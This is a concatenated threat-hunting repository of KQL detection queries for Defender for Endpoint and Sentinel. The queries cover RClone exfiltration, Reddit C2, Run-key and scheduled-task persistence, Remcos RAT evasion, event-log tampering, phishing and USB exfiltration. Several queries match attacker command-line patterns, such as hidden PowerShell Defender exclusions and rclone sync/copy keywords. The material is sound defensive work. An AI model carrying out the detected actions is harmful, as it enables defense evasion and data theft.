Detect use of RClone to compress and exfiltrate data 2 | 3 | ``` 4 | let Rclone_Commands = dynamic(["pass","user","copy","mega","sync","config","lsd","remote","ls"]); 5 |     DeviceProcessEvents 6 |     | where FileName contains "rclone" 7 |     | where ProcessCommandLine has_any (Rclone_Commands) 8 | ``` 9 | -------------------------------------------------------------------------------- /redditC2.md: -------------------------------------------------------------------------------- 1 | # Reddit used for C2 2 | 3 | # SIGMA rule: 4 | https://github.com/m4nbat/sigma/blob/master/rules/windows/network_connection/net_connection_win_reddit_api_non_browser_access.yml 5 | 6 | # Kusto 7 | `//Processes interacting with Reddit API (Has been known to be used for C2 communication) 8 | // https://github.com/kleiton0x00/RedditC2 9 | //false positives - browsers going to the URL. Or a legitimate application that uses Reddit API 10 | let browserNames = datatable (browser:string)["msedge.exe","chrome.exe","iexplorer.exe","brave.exe","firefox.exe"]; //add more broswers where needed for exclusion 11 | DeviceNetworkEvents 12 | | where not(InitiatingProcessFileName has_any (browserNames)) and RemoteUrl contains "reddit.com/api/"` 13 | -------------------------------------------------------------------------------- /registry_run_key_persistence.md: -------------------------------------------------------------------------------- 1 | # Forensics on Standard Registry Run keys in Windows. Registry Run keys can be used to establish persistence on a device. 2 | 3 | ## Source: 4 | https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/edit/main/DFIR/DFE%20-%20Registry-Run-Keys-Forensics.md 5 | 6 | ---- 7 | ### Defender For Endpoint 8 | 9 | ``` 10 | let RegistryRunKeys = dynamic 11 | ([@"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", 12 | @"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce", 13 | @"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", 14 | @"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"]); 15 | let CompromisedDevices = dynamic (["laptop1", "server1"]); 16 | let SearchWindow = 7d; //Customizable h = hours, d = days 17 | DeviceRegistryEvents 18 | | where Timestamp > ago(SearchWindow) 19 | | where DeviceName has_any (CompromisedDevices) 20 | | where RegistryKey has_any (RegistryRunKeys) 21 | | extend RegistryChangeInfo = bag_pack("RegistryKey", RegistryKey, "Action Performed", ActionType, "Old Value", PreviousRegistryKey, "New Value", RegistryValueData) 22 | | summarize TotalRunKeysChanged = count(), RegistryInfo = make_set(RegistryChangeInfo) by DeviceName 23 | ``` 24 | ### Sentinel 25 | ``` 26 | let RegistryRunKeys = dynamic 27 | ([@"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", 28 | @"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce", 29 | @"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", 30 | @"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" 31 | ]); 32 | let CompromisedDevices = dynamic (["laptop1", "server1"]); 33 | let SearchWindow = 7d; //Customizable h = hours, d = days 34 | DeviceRegistryEvents 35 | | where TimeGenerated > ago(SearchWindow) 36 | | where DeviceName has_any (CompromisedDevices) 37 | | where RegistryKey has_any (RegistryRunKeys) 38 | | extend RegistryChangeInfo = pack_dictionary("RegistryKey", RegistryKey, "Action Performed", ActionType, "Old Value", PreviousRegistryKey, "New Value", RegistryValueData) 39 | | summarize TotalRunKeysChanged = count(), RegistryInfo = make_set(RegistryChangeInfo) by DeviceName 40 | ``` 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /remcos_rat_kusto_queries_09032023.md: -------------------------------------------------------------------------------- 1 | # Remcos RAT Hunt Queries 2 | 3 | **Source:** https://www.sentinelone.com/blog/dbatloader-and-remcos-rat-sweep-eastern-europe/ 4 | 5 | `//Addition of mock trusted directories to attempt to bypass user account control 6 | //https://www.bleepingcomputer.com/news/security/bypassing-windows-10-uac-with-mock-folders-and-dll-hijacking/ 7 | DeviceProcessEvents 8 | | where ProcessCommandLine endswith @"mkdir \\?\C:\Windows " or ProcessCommandLine endswith @"mkdir \\?\C:\Windows \System32"` 9 | 10 | `//Deletion of mock trusted directories as part of cleanup 11 | DeviceProcessEvents 12 | | where ProcessCommandLine has_all ("del","/q",@"C:\Windows \System32") or ProcessCommandLine has_all ('rmdir',@"C:\Windows \System32") or ProcessCommandLine has_all ('rmdir',@"C:\Windows \")`  13 | 14 | `//Detection of files created in the above folder possibly dropped by the DBATLoader 15 | DeviceFileEvents 16 | | where ActionType =~ "FileCreated" and FileName has_any (".bat",".exe",".dll") and (FolderPath startswith @"C:\Windows \System32" or FolderPath startswith @"C:\Windows \")` 17 | 18 | `//Detection of PowerShell defese evasion via Micrososft Defender exclusions 19 | DeviceProcessEvents 20 | | where ProcessCommandLine has_all ("-WindowStyle","Hidden","-Command","Add-MpPreference","-ExclusionPath",@"C:\Users")`  21 | 22 | `// Hunt for registry run key being created for persistence when hunting for DBatLoader as part of Remcos RAT campaign 23 | DeviceRegistryEvents 24 | | where ActionType =~ "RegistryValueSet" and RegistryKey =~ @"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"` 25 | -------------------------------------------------------------------------------- /scheduled_task_peristence_from_roaming_folder.md: -------------------------------------------------------------------------------- 1 | # Source: https://redcanary.com/blog/intelligence-insights-february-2023/ 2 | 3 | # Scheduled task persistence from the roaming folder with no command-line arguments 4 | `//Scheduled task persistence from the roaming folder with no command-line arguments 5 | //The following detection analytic looks for scheduled tasks executing from the Users folder. Tasks executing with no command-line arguments are more likely to be malicious. To reduce noise, you will likely need to create exceptions for any approved applications in your environment that have this behavior. 6 | DeviceProcessEvents 7 | | where FileName has_any ("taskeng.exe","svchost.exe") and FolderPath has_all ("users","appdata\\roaming") and isempty(ProcessCommandLine)` 8 | -------------------------------------------------------------------------------- /tampering_with_windows_event_log.md: -------------------------------------------------------------------------------- 1 | # Tampering with the Windows event log 2 | 3 | source: https://www.linkedin.com/feed/update/urn:li:activity:7038997228815867904/?lipi=urn%3Ali%3Apage%3Ad_flagship3_profile_view_base_recent_activity_details_all%3B6gVrKrP2R1exxyyHSPCOjg%3D%3D 4 | 5 | ## MDE DeviceRegistryEvents Table Detection 6 | `//Detect possible tampering with the Windows event log registry keys 7 | DeviceRegistryEvents 8 | | where InitiatingProcessCommandLine has @"powershell.exe" 9 | | where ActionType == @"RegistryValueSet" 10 | | where RegistryKey startswith @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\" and RegistryValueData endswith ".dll"` 11 | 12 | ## Windows Event IDs 13 | `//Detect possible tampering with the Windows event log registry keys 14 | SecurityEvent 15 | | where EventID in (1108,1107)` 16 | -------------------------------------------------------------------------------- /test.bat: -------------------------------------------------------------------------------- 1 | test 2 | -------------------------------------------------------------------------------- /test.csv: -------------------------------------------------------------------------------- 1 | T1098 2 | T1197 3 | T1547 4 | T1037 5 | T1176 6 | T1554 7 | T1136 8 | T1543 9 | T1546 10 | T1133 11 | T1574 12 | T1525 13 | T1556 14 | T1137 15 | T1653 16 | T1542 17 | T1053 18 | T1505 19 | T1205 20 | T1078 21 | -------------------------------------------------------------------------------- /ttp_initialaccess_phishing_zip_domains.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Phishing abusing .ZIP domains 3 | 4 | # Description 5 | 6 | 7 | # MITRE ATT&CK 8 | - Initial Access 9 | - Phishing: Malicious Link 10 | 11 | # Source 12 | - Steven Lim 13 | - 14 | https://www.linkedin.com/pulse/defending-against-zip-domain-phishing-attack-microsoft-steven-lim?utm_source=share&utm_medium=member_android&utm_campaign=share_via 15 | 16 | # Query 17 | 18 | ## MDE or Sentinel 19 | 20 | ``` 21 | EmailUrlInfo 22 | | where Timestamp > ago(1h) 23 | | where UrlDomain endswith ".zip" 24 | | where Url contains "@" 25 | | join EmailEvents on $left.NetworkMessageId == $right.NetworkMessageId 26 | | project Timestamp, NetworkMessageId, SenderFromAddress, RecipientEmailAddress, Subject, Url, UrlDomain, ThreatTypes, EmailAction, ReportId 27 | 28 | ``` 29 | 30 | ## MDE or Sentinel - Unicode Abuse 31 | 32 | ``` 33 | 34 | EmailUrlInfo 35 | | where Timestamp > ago(1h) 36 | | where UrlDomain endswith ".zip" and Url contains "%E2%88%95" or Url contains "%E2%81%84" and Url contains "@" 37 | | join EmailEvents on $left.NetworkMessageId == $right.NetworkMessageId 38 | | project Timestamp, NetworkMessageId, SenderFromAddress, RecipientEmailAddress, Subject, Url, UrlDomain, ThreatTypes, EmailAction, ReportId 39 | 40 | ``` 41 | -------------------------------------------------------------------------------- /ttp_initialaccess_teamPhishing.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Possible MS Teams phishing attempt 3 | 4 | # Description 5 | 6 | # MITRE ATT&CK 7 | 8 | - Initial Access 9 | - Phishing: Malicious Attachment 10 | - Phishing: Malicious Link 11 | 12 | # Source 13 | - Steven Lim 14 | - https://www.linkedin.com/pulse/defending-against-zip-domain-phishing-attack-microsoft-steven-lim?utm_source=share&utm_medium=member_android&utm_campaign=share_via 15 | 16 | # Query 17 | 18 | ``` 19 | OfficeActivity 20 | | where TimeGenerated > ago(1h) 21 | | where RecordType =~ 'MicrosoftTeams' 22 | | where Operation == "MessageCreatedHasLink" 23 | | where CommunicationType == "OneOnOne" or CommunicationType == "GroupChat" 24 | | where UserId !endswith "your_corporate_domain_1"     // Filter off all internal teams user 1-to-1 message 25 | and UserId !endswith "your_corporate_domain_2" 26 | and UserId !endswith "your_corporate_domain_3" 27 | | extend UserDomains = tostring(split(UserId, '@')[1]) 28 | | extend UserIPs = tostring(split(ClientIP, '::ffff:')[1]) 29 | | where UserIPs != "" 30 | | distinct UserIPs 31 | | join ThreatIntelligenceIndicator on $left.UserIPs == $right.NetworkIP 32 | ``` 33 | -------------------------------------------------------------------------------- /ttp_pythonexecuted_from_pythonsetupfile.md: -------------------------------------------------------------------------------- 1 | # Name: 2 | Execution of python scripts via python installer binary 3 | 4 | # Description: 5 | 6 | 7 | # Source: 8 | @kostatsale 9 | 10 | # MITRE ATT&CK 11 | - Defense Evasion 12 | - T1202 13 | 14 | # Query for MDE or Sentinel 15 | 16 | ``` 17 | DeviceProcessEvents 18 | | where InitiatingProcessParentFileName has_any "setup.exe" and InitiatingProcessFileName =~ "pythonw.exe" and InitiatingProcessCommandLine has_all (@"\AppData\",".py") 19 | ``` 20 | -------------------------------------------------------------------------------- /ttp_usb_exfiltration. md: -------------------------------------------------------------------------------- 1 | # * Possible Exfiltration via USB Detection* 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|-----------------------------------|-------------------------------------------------------| 9 | | T1052.001 | Exfiltration Over Physical Medium: Exfiltration over USB| [Exfiltration Over Physical Medium: Exfiltration over USB](https://attack.mitre.org/techniques/T1052/001) | 10 | 11 | #### Description 12 | Adversaries such as insiders have been known to exfilrate data via removable media such as USB devices. 13 | 14 | #### Risk 15 | Removable media including USB can present a data loss risk to organisations. 16 | 17 | #### Author 18 | - **Name:** Nathan Webb 19 | - **Github:** 20 | - **Twitter:** 21 | - **LinkedIn:** [https://www.linkedin.com/in/nathanjohnwebb](htps://www.linkedin.com/in/nathanjohnwebb) 22 | - **Website:** 23 | 24 | #### References 25 | - [Threat hunt] Detecting Possible USB Data Exfiltration 26 | https://www.linkedin.com/pulse/threat-hunt-detecting-possible-usb-data-exfiltration-nathan-webb-t3ode?utm_source=share&utm_medium=member_android&utm_campaign=share_via 27 | 28 | ## Defender For Endpoint 29 | 30 | ```KQL 31 | let LookBackPeriod=14d; // How long to look back for USB activity 32 | let DetectionPeriod=1d; 33 | let DeviceConnectedCopiedWindow=1h; // adjust to have a longer time range between device connected and files copied 34 | let SystemDrive=dynamic(['C:', 'D:']); // add known system drive paths in here 35 | DeviceEvents 36 | | where Timestamp > ago(LookBackPeriod) 37 | | where ActionType contains "PnpDeviceConnected" 38 | | extend DeviceType = tostring(todynamic(AdditionalFields).ClassName) 39 | | extend UsbId = tostring(todynamic(AdditionalFields).DeviceId) 40 | | where DeviceType contains "drive" or DeviceType contains "disk" 41 | // get a count of how many times that USB vendor and id has been inserted (this just identifies the type of device and is not a unique ID per USB device) 42 | // bin our timestamp so we can join on this time window when searching for USB events 43 | | summarize FirstSeen=min(Timestamp), TimesDriveConnected=count() by UsbId, bin(Timestamp, DeviceConnectedCopiedWindow), DeviceId, DeviceName 44 | | where FirstSeen > ago(DetectionPeriod) 45 | // do a join to get copied files from the host that occur within the same timeeframe 46 | | join (DeviceFileEvents 47 | | where Timestamp > ago(DetectionPeriod) 48 | | where ActionType == "FileCreated" 49 | | where FileOriginReferrerUrl contains @"\" // file has come from a windows path 50 | | extend SourceDrive=tostring(split(FileOriginReferrerUrl, @"\")[0]) // get the drive letter of the system path 51 | | extend DestDrive=tostring(split(FolderPath, @"\")[0]) // get the drive letter of where the file was written to 52 | | where SourceDrive has_any (SystemDrive) and not(DestDrive has_any (SystemDrive)) // a copy off the system drive 53 | | summarize FilesPathsCopied=make_set(FolderPath, 1000), FileCopiesCount=count() by SourceDrive, DestDrive, DeviceId, DeviceName, bin(Timestamp, DeviceConnectedCopiedWindow)) 54 | on DeviceId, Timestamp 55 | ``` --------------------------------------------------------------------------------